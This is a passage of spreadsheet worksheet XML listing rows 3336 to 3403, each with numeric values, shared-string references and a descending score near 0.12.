      </c>
      <c r="B3336" s="2">
        <v>4.7322408E7</v>
      </c>
      <c r="C3336" s="2" t="s">
        <v>3141</v>
      </c>
      <c r="D3336" s="2">
        <v>1.0</v>
      </c>
      <c r="E3336" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3336" s="2">
        <v>0.125</v>
      </c>
    </row>
    <row r="3337" ht="15.75" customHeight="1">
      <c r="A3337" s="1">
        <v>10588.0</v>
      </c>
      <c r="B3337" s="2">
        <v>1.3313889E7</v>
      </c>
      <c r="C3337" s="2" t="s">
        <v>3142</v>
      </c>
      <c r="D3337" s="2">
        <v>1.0</v>
      </c>
      <c r="E3337" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3337" s="2">
        <v>0.125</v>
      </c>
    </row>
    <row r="3338" ht="15.75" customHeight="1">
      <c r="A3338" s="1">
        <v>16056.0</v>
      </c>
      <c r="B3338" s="2">
        <v>4.5268665E7</v>
      </c>
      <c r="C3338" s="2" t="s">
        <v>3143</v>
      </c>
      <c r="D3338" s="2">
        <v>1.0</v>
      </c>
      <c r="E3338" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3338" s="2">
        <v>0.125</v>
      </c>
    </row>
    <row r="3339" ht="15.75" customHeight="1">
      <c r="A3339" s="1">
        <v>1485.0</v>
      </c>
      <c r="B3339" s="2">
        <v>2.7170723E7</v>
      </c>
      <c r="C3339" s="2" t="s">
        <v>3144</v>
      </c>
      <c r="D3339" s="2">
        <v>1.0</v>
      </c>
      <c r="E3339" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3339" s="2">
        <v>0.1247723132969034</v>
      </c>
    </row>
    <row r="3340" ht="15.75" customHeight="1">
      <c r="A3340" s="1">
        <v>14095.0</v>
      </c>
      <c r="B3340" s="2">
        <v>3.7744642E7</v>
      </c>
      <c r="C3340" s="2" t="s">
        <v>3145</v>
      </c>
      <c r="D3340" s="2">
        <v>1.0</v>
      </c>
      <c r="E3340" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3340" s="2">
        <v>0.1245519713261649</v>
      </c>
    </row>
    <row r="3341" ht="15.75" customHeight="1">
      <c r="A3341" s="1">
        <v>27228.0</v>
      </c>
      <c r="B3341" s="2">
        <v>2.1021151E7</v>
      </c>
      <c r="C3341" s="2" t="s">
        <v>3146</v>
      </c>
      <c r="D3341" s="2">
        <v>1.0</v>
      </c>
      <c r="E3341" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3341" s="2">
        <v>0.1245519713261649</v>
      </c>
    </row>
    <row r="3342" ht="15.75" customHeight="1">
      <c r="A3342" s="1">
        <v>1573.0</v>
      </c>
      <c r="B3342" s="2">
        <v>2.7705939E7</v>
      </c>
      <c r="C3342" s="2" t="s">
        <v>3147</v>
      </c>
      <c r="D3342" s="2">
        <v>1.0</v>
      </c>
      <c r="E3342" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3342" s="2">
        <v>0.1244855967078189</v>
      </c>
    </row>
    <row r="3343" ht="15.75" customHeight="1">
      <c r="A3343" s="1">
        <v>11301.0</v>
      </c>
      <c r="B3343" s="2">
        <v>2.0971718E7</v>
      </c>
      <c r="C3343" s="2" t="s">
        <v>3148</v>
      </c>
      <c r="D3343" s="2">
        <v>1.0</v>
      </c>
      <c r="E3343" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3343" s="2">
        <v>0.1244855967078189</v>
      </c>
    </row>
    <row r="3344" ht="15.75" customHeight="1">
      <c r="A3344" s="1">
        <v>12341.0</v>
      </c>
      <c r="B3344" s="2">
        <v>2.8601425E7</v>
      </c>
      <c r="C3344" s="2" t="s">
        <v>3149</v>
      </c>
      <c r="D3344" s="2">
        <v>1.0</v>
      </c>
      <c r="E3344" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3344" s="2">
        <v>0.1244855967078189</v>
      </c>
    </row>
    <row r="3345" ht="15.75" customHeight="1">
      <c r="A3345" s="1">
        <v>19024.0</v>
      </c>
      <c r="B3345" s="2">
        <v>5.4552554E7</v>
      </c>
      <c r="C3345" s="2" t="s">
        <v>3150</v>
      </c>
      <c r="D3345" s="2">
        <v>1.0</v>
      </c>
      <c r="E3345" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3345" s="2">
        <v>0.1244855967078189</v>
      </c>
    </row>
    <row r="3346" ht="15.75" customHeight="1">
      <c r="A3346" s="1">
        <v>19636.0</v>
      </c>
      <c r="B3346" s="2">
        <v>5.6282151E7</v>
      </c>
      <c r="C3346" s="2" t="s">
        <v>3151</v>
      </c>
      <c r="D3346" s="2">
        <v>1.0</v>
      </c>
      <c r="E3346" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3346" s="2">
        <v>0.1244855967078189</v>
      </c>
    </row>
    <row r="3347" ht="15.75" customHeight="1">
      <c r="A3347" s="1">
        <v>19951.0</v>
      </c>
      <c r="B3347" s="2">
        <v>5.7510364E7</v>
      </c>
      <c r="C3347" s="2" t="s">
        <v>3152</v>
      </c>
      <c r="D3347" s="2">
        <v>1.0</v>
      </c>
      <c r="E3347" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3347" s="2">
        <v>0.1244855967078189</v>
      </c>
    </row>
    <row r="3348" ht="15.75" customHeight="1">
      <c r="A3348" s="1">
        <v>1887.0</v>
      </c>
      <c r="B3348" s="2">
        <v>2.9798052E7</v>
      </c>
      <c r="C3348" s="2" t="s">
        <v>3153</v>
      </c>
      <c r="D3348" s="2">
        <v>1.0</v>
      </c>
      <c r="E3348" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3348" s="2">
        <v>0.1242424242424242</v>
      </c>
    </row>
    <row r="3349" ht="15.75" customHeight="1">
      <c r="A3349" s="1">
        <v>4559.0</v>
      </c>
      <c r="B3349" s="2">
        <v>4.2713685E7</v>
      </c>
      <c r="C3349" s="2" t="s">
        <v>3154</v>
      </c>
      <c r="D3349" s="2">
        <v>1.0</v>
      </c>
      <c r="E3349" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3349" s="2">
        <v>0.1242424242424242</v>
      </c>
    </row>
    <row r="3350" ht="15.75" customHeight="1">
      <c r="A3350" s="1">
        <v>5175.0</v>
      </c>
      <c r="B3350" s="2">
        <v>4.4753164E7</v>
      </c>
      <c r="C3350" s="2" t="s">
        <v>3155</v>
      </c>
      <c r="D3350" s="2">
        <v>1.0</v>
      </c>
      <c r="E3350" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3350" s="2">
        <v>0.1242424242424242</v>
      </c>
    </row>
    <row r="3351" ht="15.75" customHeight="1">
      <c r="A3351" s="1">
        <v>7869.0</v>
      </c>
      <c r="B3351" s="2">
        <v>5.2399683E7</v>
      </c>
      <c r="C3351" s="2" t="s">
        <v>3156</v>
      </c>
      <c r="D3351" s="2">
        <v>1.0</v>
      </c>
      <c r="E3351" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3351" s="2">
        <v>0.1242424242424242</v>
      </c>
    </row>
    <row r="3352" ht="15.75" customHeight="1">
      <c r="A3352" s="1">
        <v>7885.0</v>
      </c>
      <c r="B3352" s="2">
        <v>5.2417149E7</v>
      </c>
      <c r="C3352" s="2" t="s">
        <v>3157</v>
      </c>
      <c r="D3352" s="2">
        <v>1.0</v>
      </c>
      <c r="E3352" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3352" s="2">
        <v>0.1242424242424242</v>
      </c>
    </row>
    <row r="3353" ht="15.75" customHeight="1">
      <c r="A3353" s="1">
        <v>8510.0</v>
      </c>
      <c r="B3353" s="2">
        <v>5.4061236E7</v>
      </c>
      <c r="C3353" s="2" t="s">
        <v>3158</v>
      </c>
      <c r="D3353" s="2">
        <v>1.0</v>
      </c>
      <c r="E3353" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3353" s="2">
        <v>0.1242424242424242</v>
      </c>
    </row>
    <row r="3354" ht="15.75" customHeight="1">
      <c r="A3354" s="1">
        <v>15003.0</v>
      </c>
      <c r="B3354" s="2">
        <v>4.1466355E7</v>
      </c>
      <c r="C3354" s="2" t="s">
        <v>3159</v>
      </c>
      <c r="D3354" s="2">
        <v>1.0</v>
      </c>
      <c r="E3354" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3354" s="2">
        <v>0.1242424242424242</v>
      </c>
    </row>
    <row r="3355" ht="15.75" customHeight="1">
      <c r="A3355" s="1">
        <v>15741.0</v>
      </c>
      <c r="B3355" s="2">
        <v>4.4114902E7</v>
      </c>
      <c r="C3355" s="2" t="s">
        <v>3160</v>
      </c>
      <c r="D3355" s="2">
        <v>1.0</v>
      </c>
      <c r="E3355" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3355" s="2">
        <v>0.1242424242424242</v>
      </c>
    </row>
    <row r="3356" ht="15.75" customHeight="1">
      <c r="A3356" s="1">
        <v>8105.0</v>
      </c>
      <c r="B3356" s="2">
        <v>5.3072356E7</v>
      </c>
      <c r="C3356" s="2" t="s">
        <v>3161</v>
      </c>
      <c r="D3356" s="2">
        <v>1.0</v>
      </c>
      <c r="E3356" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3356" s="2">
        <v>0.1241319444444445</v>
      </c>
    </row>
    <row r="3357" ht="15.75" customHeight="1">
      <c r="A3357" s="1">
        <v>29427.0</v>
      </c>
      <c r="B3357" s="2">
        <v>3.2219188E7</v>
      </c>
      <c r="C3357" s="2" t="s">
        <v>3162</v>
      </c>
      <c r="D3357" s="2">
        <v>1.0</v>
      </c>
      <c r="E3357" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3357" s="2">
        <v>0.1241319444444445</v>
      </c>
    </row>
    <row r="3358" ht="15.75" customHeight="1">
      <c r="A3358" s="1">
        <v>34124.0</v>
      </c>
      <c r="B3358" s="2">
        <v>9768682.0</v>
      </c>
      <c r="C3358" s="2" t="s">
        <v>3163</v>
      </c>
      <c r="D3358" s="2">
        <v>1.0</v>
      </c>
      <c r="E3358" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3358" s="2">
        <v>0.1241319444444445</v>
      </c>
    </row>
    <row r="3359" ht="15.75" customHeight="1">
      <c r="A3359" s="1">
        <v>3379.0</v>
      </c>
      <c r="B3359" s="2">
        <v>3.7938454E7</v>
      </c>
      <c r="C3359" s="2" t="s">
        <v>3164</v>
      </c>
      <c r="D3359" s="2">
        <v>1.0</v>
      </c>
      <c r="E3359" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3359" s="2">
        <v>0.1240079365079365</v>
      </c>
    </row>
    <row r="3360" ht="15.75" customHeight="1">
      <c r="A3360" s="1">
        <v>7142.0</v>
      </c>
      <c r="B3360" s="2">
        <v>5.045588E7</v>
      </c>
      <c r="C3360" s="2" t="s">
        <v>3165</v>
      </c>
      <c r="D3360" s="2">
        <v>1.0</v>
      </c>
      <c r="E3360" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3360" s="2">
        <v>0.1240079365079365</v>
      </c>
    </row>
    <row r="3361" ht="15.75" customHeight="1">
      <c r="A3361" s="1">
        <v>8183.0</v>
      </c>
      <c r="B3361" s="2">
        <v>5.3245058E7</v>
      </c>
      <c r="C3361" s="2" t="s">
        <v>3166</v>
      </c>
      <c r="D3361" s="2">
        <v>1.0</v>
      </c>
      <c r="E3361" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3361" s="2">
        <v>0.1240079365079365</v>
      </c>
    </row>
    <row r="3362" ht="15.75" customHeight="1">
      <c r="A3362" s="1">
        <v>8809.0</v>
      </c>
      <c r="B3362" s="2">
        <v>5.462014E7</v>
      </c>
      <c r="C3362" s="2" t="s">
        <v>3167</v>
      </c>
      <c r="D3362" s="2">
        <v>1.0</v>
      </c>
      <c r="E3362" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3362" s="2">
        <v>0.1240079365079365</v>
      </c>
    </row>
    <row r="3363" ht="15.75" customHeight="1">
      <c r="A3363" s="1">
        <v>16364.0</v>
      </c>
      <c r="B3363" s="2">
        <v>4.6130144E7</v>
      </c>
      <c r="C3363" s="2" t="s">
        <v>3168</v>
      </c>
      <c r="D3363" s="2">
        <v>1.0</v>
      </c>
      <c r="E3363" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3363" s="2">
        <v>0.1240079365079365</v>
      </c>
    </row>
    <row r="3364" ht="15.75" customHeight="1">
      <c r="A3364" s="1">
        <v>17846.0</v>
      </c>
      <c r="B3364" s="2">
        <v>5.0953031E7</v>
      </c>
      <c r="C3364" s="2" t="s">
        <v>3169</v>
      </c>
      <c r="D3364" s="2">
        <v>1.0</v>
      </c>
      <c r="E3364" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3364" s="2">
        <v>0.123931623931624</v>
      </c>
    </row>
    <row r="3365" ht="15.75" customHeight="1">
      <c r="A3365" s="1">
        <v>1742.0</v>
      </c>
      <c r="B3365" s="2">
        <v>2.8818039E7</v>
      </c>
      <c r="C3365" s="2" t="s">
        <v>3170</v>
      </c>
      <c r="D3365" s="2">
        <v>1.0</v>
      </c>
      <c r="E3365" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3365" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="3366" ht="15.75" customHeight="1">
      <c r="A3366" s="1">
        <v>2069.0</v>
      </c>
      <c r="B3366" s="2">
        <v>3.1093891E7</v>
      </c>
      <c r="C3366" s="2" t="s">
        <v>3171</v>
      </c>
      <c r="D3366" s="2">
        <v>1.0</v>
      </c>
      <c r="E3366" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3366" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="3367" ht="15.75" customHeight="1">
      <c r="A3367" s="1">
        <v>3539.0</v>
      </c>
      <c r="B3367" s="2">
        <v>3.8690388E7</v>
      </c>
      <c r="C3367" s="2" t="s">
        <v>3172</v>
      </c>
      <c r="D3367" s="2">
        <v>1.0</v>
      </c>
      <c r="E3367" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3367" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="3368" ht="15.75" customHeight="1">
      <c r="A3368" s="1">
        <v>4350.0</v>
      </c>
      <c r="B3368" s="2">
        <v>4.2085604E7</v>
      </c>
      <c r="C3368" s="2" t="s">
        <v>3173</v>
      </c>
      <c r="D3368" s="2">
        <v>1.0</v>
      </c>
      <c r="E3368" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3368" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="3369" ht="15.75" customHeight="1">
      <c r="A3369" s="1">
        <v>5430.0</v>
      </c>
      <c r="B3369" s="2">
        <v>4.5576773E7</v>
      </c>
      <c r="C3369" s="2" t="s">
        <v>3174</v>
      </c>
      <c r="D3369" s="2">
        <v>1.0</v>
      </c>
      <c r="E3369" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3369" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="3370" ht="15.75" customHeight="1">
      <c r="A3370" s="1">
        <v>17108.0</v>
      </c>
      <c r="B3370" s="2">
        <v>4.8726706E7</v>
      </c>
      <c r="C3370" s="2" t="s">
        <v>3175</v>
      </c>
      <c r="D3370" s="2">
        <v>1.0</v>
      </c>
      <c r="E3370" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3370" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="3371" ht="15.75" customHeight="1">
      <c r="A3371" s="1">
        <v>8890.0</v>
      </c>
      <c r="B3371" s="2">
        <v>5.4786883E7</v>
      </c>
      <c r="C3371" s="2" t="s">
        <v>3176</v>
      </c>
      <c r="D3371" s="2">
        <v>1.0</v>
      </c>
      <c r="E3371" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3371" s="2">
        <v>0.1237373737373738</v>
      </c>
    </row>
    <row r="3372" ht="15.75" customHeight="1">
      <c r="A3372" s="1">
        <v>29649.0</v>
      </c>
      <c r="B3372" s="2">
        <v>3.3846318E7</v>
      </c>
      <c r="C3372" s="2" t="s">
        <v>3177</v>
      </c>
      <c r="D3372" s="2">
        <v>1.0</v>
      </c>
      <c r="E3372" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3372" s="2">
        <v>0.1237373737373738</v>
      </c>
    </row>
    <row r="3373" ht="15.75" customHeight="1">
      <c r="A3373" s="1">
        <v>205.0</v>
      </c>
      <c r="B3373" s="2">
        <v>1.453019E7</v>
      </c>
      <c r="C3373" s="2" t="s">
        <v>3178</v>
      </c>
      <c r="D3373" s="2">
        <v>1.0</v>
      </c>
      <c r="E3373" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3373" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="3374" ht="15.75" customHeight="1">
      <c r="A3374" s="1">
        <v>2682.0</v>
      </c>
      <c r="B3374" s="2">
        <v>3.4810211E7</v>
      </c>
      <c r="C3374" s="2" t="s">
        <v>3179</v>
      </c>
      <c r="D3374" s="2">
        <v>1.0</v>
      </c>
      <c r="E3374" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3374" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="3375" ht="15.75" customHeight="1">
      <c r="A3375" s="1">
        <v>2887.0</v>
      </c>
      <c r="B3375" s="2">
        <v>3.5704632E7</v>
      </c>
      <c r="C3375" s="2" t="s">
        <v>3180</v>
      </c>
      <c r="D3375" s="2">
        <v>1.0</v>
      </c>
      <c r="E3375" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3375" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="3376" ht="15.75" customHeight="1">
      <c r="A3376" s="1">
        <v>3422.0</v>
      </c>
      <c r="B3376" s="2">
        <v>3.8163037E7</v>
      </c>
      <c r="C3376" s="2" t="s">
        <v>3181</v>
      </c>
      <c r="D3376" s="2">
        <v>1.0</v>
      </c>
      <c r="E3376" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3376" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="3377" ht="15.75" customHeight="1">
      <c r="A3377" s="1">
        <v>4354.0</v>
      </c>
      <c r="B3377" s="2">
        <v>4.2088721E7</v>
      </c>
      <c r="C3377" s="2" t="s">
        <v>3182</v>
      </c>
      <c r="D3377" s="2">
        <v>1.0</v>
      </c>
      <c r="E3377" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3377" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="3378" ht="15.75" customHeight="1">
      <c r="A3378" s="1">
        <v>5254.0</v>
      </c>
      <c r="B3378" s="2">
        <v>4.5104254E7</v>
      </c>
      <c r="C3378" s="2" t="s">
        <v>3183</v>
      </c>
      <c r="D3378" s="2">
        <v>1.0</v>
      </c>
      <c r="E3378" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3378" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="3379" ht="15.75" customHeight="1">
      <c r="A3379" s="1">
        <v>6701.0</v>
      </c>
      <c r="B3379" s="2">
        <v>4.920417E7</v>
      </c>
      <c r="C3379" s="2" t="s">
        <v>3184</v>
      </c>
      <c r="D3379" s="2">
        <v>1.0</v>
      </c>
      <c r="E3379" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3379" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="3380" ht="15.75" customHeight="1">
      <c r="A3380" s="1">
        <v>7035.0</v>
      </c>
      <c r="B3380" s="2">
        <v>5.0135182E7</v>
      </c>
      <c r="C3380" s="2" t="s">
        <v>3185</v>
      </c>
      <c r="D3380" s="2">
        <v>1.0</v>
      </c>
      <c r="E3380" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3380" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="3381" ht="15.75" customHeight="1">
      <c r="A3381" s="1">
        <v>7966.0</v>
      </c>
      <c r="B3381" s="2">
        <v>5.2690209E7</v>
      </c>
      <c r="C3381" s="2" t="s">
        <v>3186</v>
      </c>
      <c r="D3381" s="2">
        <v>1.0</v>
      </c>
      <c r="E3381" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3381" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="3382" ht="15.75" customHeight="1">
      <c r="A3382" s="1">
        <v>9191.0</v>
      </c>
      <c r="B3382" s="2">
        <v>5.5390141E7</v>
      </c>
      <c r="C3382" s="2" t="s">
        <v>3187</v>
      </c>
      <c r="D3382" s="2">
        <v>1.0</v>
      </c>
      <c r="E3382" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3382" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="3383" ht="15.75" customHeight="1">
      <c r="A3383" s="1">
        <v>9230.0</v>
      </c>
      <c r="B3383" s="2">
        <v>5.5451753E7</v>
      </c>
      <c r="C3383" s="2" t="s">
        <v>3188</v>
      </c>
      <c r="D3383" s="2">
        <v>1.0</v>
      </c>
      <c r="E3383" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3383" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="3384" ht="15.75" customHeight="1">
      <c r="A3384" s="1">
        <v>9310.0</v>
      </c>
      <c r="B3384" s="2">
        <v>5.5574728E7</v>
      </c>
      <c r="C3384" s="2" t="s">
        <v>3189</v>
      </c>
      <c r="D3384" s="2">
        <v>1.0</v>
      </c>
      <c r="E3384" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3384" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="3385" ht="15.75" customHeight="1">
      <c r="A3385" s="1">
        <v>10960.0</v>
      </c>
      <c r="B3385" s="2">
        <v>1.7182834E7</v>
      </c>
      <c r="C3385" s="2" t="s">
        <v>3190</v>
      </c>
      <c r="D3385" s="2">
        <v>1.0</v>
      </c>
      <c r="E3385" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3385" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="3386" ht="15.75" customHeight="1">
      <c r="A3386" s="1">
        <v>11559.0</v>
      </c>
      <c r="B3386" s="2">
        <v>2.2715191E7</v>
      </c>
      <c r="C3386" s="2" t="s">
        <v>3191</v>
      </c>
      <c r="D3386" s="2">
        <v>1.0</v>
      </c>
      <c r="E3386" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3386" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="3387" ht="15.75" customHeight="1">
      <c r="A3387" s="1">
        <v>12373.0</v>
      </c>
      <c r="B3387" s="2">
        <v>2.8820257E7</v>
      </c>
      <c r="C3387" s="2" t="s">
        <v>3192</v>
      </c>
      <c r="D3387" s="2">
        <v>1.0</v>
      </c>
      <c r="E3387" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3387" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="3388" ht="15.75" customHeight="1">
      <c r="A3388" s="1">
        <v>12375.0</v>
      </c>
      <c r="B3388" s="2">
        <v>2.8824536E7</v>
      </c>
      <c r="C3388" s="2" t="s">
        <v>3193</v>
      </c>
      <c r="D3388" s="2">
        <v>1.0</v>
      </c>
      <c r="E3388" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3388" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="3389" ht="15.75" customHeight="1">
      <c r="A3389" s="1">
        <v>13212.0</v>
      </c>
      <c r="B3389" s="2">
        <v>3.416369E7</v>
      </c>
      <c r="C3389" s="2" t="s">
        <v>3194</v>
      </c>
      <c r="D3389" s="2">
        <v>1.0</v>
      </c>
      <c r="E3389" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3389" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="3390" ht="15.75" customHeight="1">
      <c r="A3390" s="1">
        <v>13973.0</v>
      </c>
      <c r="B3390" s="2">
        <v>3.7335427E7</v>
      </c>
      <c r="C3390" s="2" t="s">
        <v>3195</v>
      </c>
      <c r="D3390" s="2">
        <v>1.0</v>
      </c>
      <c r="E3390" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3390" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="3391" ht="15.75" customHeight="1">
      <c r="A3391" s="1">
        <v>14928.0</v>
      </c>
      <c r="B3391" s="2">
        <v>4.1191503E7</v>
      </c>
      <c r="C3391" s="2" t="s">
        <v>3196</v>
      </c>
      <c r="D3391" s="2">
        <v>1.0</v>
      </c>
      <c r="E3391" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3391" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="3392" ht="15.75" customHeight="1">
      <c r="A3392" s="1">
        <v>15107.0</v>
      </c>
      <c r="B3392" s="2">
        <v>4.183156E7</v>
      </c>
      <c r="C3392" s="2" t="s">
        <v>3197</v>
      </c>
      <c r="D3392" s="2">
        <v>1.0</v>
      </c>
      <c r="E3392" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3392" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="3393" ht="15.75" customHeight="1">
      <c r="A3393" s="1">
        <v>15376.0</v>
      </c>
      <c r="B3393" s="2">
        <v>4.2752736E7</v>
      </c>
      <c r="C3393" s="2" t="s">
        <v>3198</v>
      </c>
      <c r="D3393" s="2">
        <v>1.0</v>
      </c>
      <c r="E3393" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3393" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="3394" ht="15.75" customHeight="1">
      <c r="A3394" s="1">
        <v>15701.0</v>
      </c>
      <c r="B3394" s="2">
        <v>4393461.0</v>
      </c>
      <c r="C3394" s="2" t="s">
        <v>3199</v>
      </c>
      <c r="D3394" s="2">
        <v>1.0</v>
      </c>
      <c r="E3394" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3394" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="3395" ht="15.75" customHeight="1">
      <c r="A3395" s="1">
        <v>16080.0</v>
      </c>
      <c r="B3395" s="2">
        <v>4.5363951E7</v>
      </c>
      <c r="C3395" s="2" t="s">
        <v>3200</v>
      </c>
      <c r="D3395" s="2">
        <v>1.0</v>
      </c>
      <c r="E3395" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3395" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="3396" ht="15.75" customHeight="1">
      <c r="A3396" s="1">
        <v>17402.0</v>
      </c>
      <c r="B3396" s="2">
        <v>4.9635362E7</v>
      </c>
      <c r="C3396" s="2" t="s">
        <v>3201</v>
      </c>
      <c r="D3396" s="2">
        <v>1.0</v>
      </c>
      <c r="E3396" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3396" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="3397" ht="15.75" customHeight="1">
      <c r="A3397" s="1">
        <v>17962.0</v>
      </c>
      <c r="B3397" s="2">
        <v>5.1315247E7</v>
      </c>
      <c r="C3397" s="2" t="s">
        <v>3202</v>
      </c>
      <c r="D3397" s="2">
        <v>1.0</v>
      </c>
      <c r="E3397" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3397" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="3398" ht="15.75" customHeight="1">
      <c r="A3398" s="1">
        <v>18154.0</v>
      </c>
      <c r="B3398" s="2">
        <v>5.1873169E7</v>
      </c>
      <c r="C3398" s="2" t="s">
        <v>3203</v>
      </c>
      <c r="D3398" s="2">
        <v>1.0</v>
      </c>
      <c r="E3398" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3398" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="3399" ht="15.75" customHeight="1">
      <c r="A3399" s="1">
        <v>18371.0</v>
      </c>
      <c r="B3399" s="2">
        <v>5.2571668E7</v>
      </c>
      <c r="C3399" s="2" t="s">
        <v>3204</v>
      </c>
      <c r="D3399" s="2">
        <v>1.0</v>
      </c>
      <c r="E3399" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3399" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="3400" ht="15.75" customHeight="1">
      <c r="A3400" s="1">
        <v>20604.0</v>
      </c>
      <c r="B3400" s="2">
        <v>1.3890692E7</v>
      </c>
      <c r="C3400" s="2" t="s">
        <v>3205</v>
      </c>
      <c r="D3400" s="2">
        <v>1.0</v>
      </c>
      <c r="E3400" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3400" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="3401" ht="15.75" customHeight="1">
      <c r="A3401" s="1">
        <v>20651.0</v>
      </c>
      <c r="B3401" s="2">
        <v>1.4255637E7</v>
      </c>
      <c r="C3401" s="2" t="s">
        <v>3206</v>
      </c>
      <c r="D3401" s="2">
        <v>1.0</v>
      </c>
      <c r="E3401" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3401" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="3402" ht="15.75" customHeight="1">
      <c r="A3402" s="1">
        <v>24957.0</v>
      </c>
      <c r="B3402" s="2">
        <v>1.2598405E7</v>
      </c>
      <c r="C3402" s="2" t="s">
        <v>3207</v>
      </c>
      <c r="D3402" s="2">
        <v>1.0</v>
      </c>
      <c r="E3402" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3402" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="3403" ht="15.75" customHeight="1">
      <c r="A3403" s="1">
        <v>25021.0</v>
      </c>
      <c r="B3403" s="2">
